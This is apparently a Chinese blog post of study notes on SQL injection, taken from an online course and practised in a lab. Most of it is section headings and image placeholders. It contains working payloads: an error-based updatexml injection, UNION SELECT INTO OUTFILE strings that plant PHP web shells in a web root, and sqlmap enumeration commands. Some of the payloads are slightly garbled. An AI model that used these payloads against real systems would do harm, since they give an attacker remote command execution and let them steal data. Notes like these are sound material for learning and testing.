SQL Injection

2019-03-16  本文已影响0人  闭眼就能看得见

整理自: https://www.ichunqiu.com/course/63879

SQL Injection概述

二、SQL Injection 渗透测试流程

第一步:注入点探测

第二步:信息获取

第三步:获取权限

常见注入点类型

如何判断注入点的类型

案例演示

1.数字型注入演示

2.字符型注入演示

image.png

搜索型注入

image.png

XX型

union注入

information_schema注入

基于函数报错的注入

演示

*找到注入点后,构造payload。 l' and updatexml(1,version(),0)#


image.png

基于insert update delete的注入利用案

image.png
image.png
image.png
image.png
image.png
image.png
image.png
image.png
image.png
image.png
image.png
image.png
image.png

extractvalue()

http header注入

盲注

对服务器远程控制案例

** select 1,2 into outfile " var/www/html/1.txt"
** into outfile 将select的结果写入到指定目录的1.txt中
** 在一些没有回显的注入中可以使用into outfile将结果写入到指定文件,然后访问获取
前提条件
1.需要知道远程目录
2.需要远程目录有写权限
3.需要数据库开启了secure_file_priv
kobe' union select "<?php @eval(_GET['test'])?>",2 into outfile "C:\\xampp\\htdocs\\1.php"# ![image.png](https://img.haomeiwen.com/i14172142/81f29f646c0aaac8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240) ![image.png](https://img.haomeiwen.com/i14172142/9e665be802455a0f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240) ![image.png](https://img.haomeiwen.com/i14172142/ac65b4ceb8575d31.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240) ![image.png](https://img.haomeiwen.com/i14172142/c867f0f32ef1825a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240) kobe' union select "<?php system(_GET['cmd'])?>",2 into outfile "C:\xampp\htdocs\2.php"#

image.png
image.png
image.png

暴力破解在sql中的应用

sql漏洞防范

sqlmap简单使用方法

经典用法
第一步:
-u "xxx" --cookie="yyy" //带上cookie对url进行注入探测
第二部
-u "xxx" --cookie="yyy" -current-db //对数据库名进行获取
第三步:
-u "xxx" --cookie="yyy" -D pikaku --tables //对数据库的表名进行枚举
第四步:
-u "xxx" --cookie="yyy" -D pikaku -T users ==columns //对
pikaku里面名为users表的列名进行枚举


image.png image.png
image.png image.png image.png
image.png
image.png
image.png
image.png
image.png image.png
image.png
image.png
上一篇下一篇

猜你喜欢

热点阅读